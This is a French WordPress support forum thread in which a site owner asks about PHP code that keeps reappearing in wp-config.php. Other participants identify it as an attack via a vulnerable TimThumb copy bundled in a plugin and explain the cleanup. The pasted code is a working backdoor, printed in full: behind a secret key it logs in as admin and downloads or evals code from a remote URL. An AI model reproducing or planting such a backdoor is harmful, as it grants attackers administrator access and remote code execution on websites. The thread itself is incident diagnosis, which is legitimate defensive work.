- Statut : non résolu
- Ce sujet contient 8 réponses, 2 participants et a été mis à jour pour la dernière fois par
, le il y a 13 années et 7 mois.
-
Messages
-
Bonjour,
Ma configuration WP actuelle
– Version de WordPress : 3.2.1
– Version de PHP/MySQL : 5
– Thème utilisé : lightword
– Extensions en place : plusieurs
– Nom de l’hebergeur : 11
– Adresse du site : http://blog.creation-site-france.org/Problème(s) rencontré(s) : J’ai un truc bizarre dans mon fichier wp-config.php, vers la ligne 2092 qui se met en place j’ai beau le supprimer à chaque fois ça revient :
if (isset($_GET)&& isset($_GET)){
if ($_GET == ‘182be0c5cdcd5072bb1864cdee4d3d6e’){
if ($_GET== ‘login’){
$user_login = ‘admin’;
$user = get_userdatabylogin($user_login);
$user_id = $user->ID;
wp_set_current_user($user_id, $user_login);
wp_set_auth_cookie($user_id);
do_action(‘wp_login’, $user_login);
}
if (($_GET== ‘exec’)&&(isset($_GET))){
$ch = curl_init($_GET);
$fnm = md5(rand(0,100)).’.php’;
$fp = fopen($fnm, « w »);
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_exec($ch);
curl_close($ch);
fclose($fp);
echo « « ;
}
if (($_GET== ‘eval’)&&(isset($_GET))){
$ch = curl_init($_GET);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$re = curl_exec($ch);
curl_close($ch);
eval($re);
}}}Je me demandes vraiement ce que ça peut être? une idée, merci!
ton site est victime d’une attaque, vérifies par exemple que timthumb est utilisé par le thème ou une extension, si c’est le cas, prend la dernière version.
J’en ai marre ça fait des mois que ça dure, je croyais que c’était fini cette merd** pourtant tout est à jour grrr
TimThumb c’est bien pour l’affichage d’images par Google non?c’est pour le redimensionnement d’images, quel qu’en soient les provenances. Ce n’est pas certains que cela vienne de timthumb, c’était une première hypothèse.
Tu peux toujours faire une recherche de chaine dans tous les fichiers pour vérifier qu’une extension s’en sert, et t’assurer de la version utilisée.
Sinon, il existe des outils d’analyse, il faudrait en essayer quelques uns.
Good problème réglé, merci, je savais déjà où cherché faut dire mais je n’avais pas compris quoi faire exactement la 1ere fois grrrrr :fouet::fouet::fouet::fouet::fouet:
Il s’agit en fait du plugin IGIT Related Posts With Thumb Image After Posts il possède effectivement le fichier timthumb.php dans son dossier!! a éviter, je parles en connaissance de cause!!
Supprimez le carrément pour éviter toute récidive…
A bon entendeur, salut 😉
Merci encore 1 fois Guy!
Théoriquement la dernière version de timthumb est sure. Tu peux aussi regarder dans le dossier cache de timthumb si il n’y a pas quelque chose qui ne devrait pas y être.
Tu veux dire dans le dossier wp-content/cache ou ailleurs, je ne comprends pas ta réponse en fait,
Tu peux aussi regarder dans le dossier cache de timthumb si il n’y a pas quelque chose qui ne devrait pas y être.
Timthumb pour redimensionner ses images et ne pas les refaire à chaque fois, crée un répertoire cache avec les permissions qui vont bien. La faille n’était pas que timthumb exécutait un code malveillant, mais qu’il était possible de placer dans le cache ce bout de code à partir d’un site externe. Vérifies donc dans les fichiers cache crées par timthumb qu’aucun code n’y est caché.
- Vous devez être connecté pour répondre à ce sujet.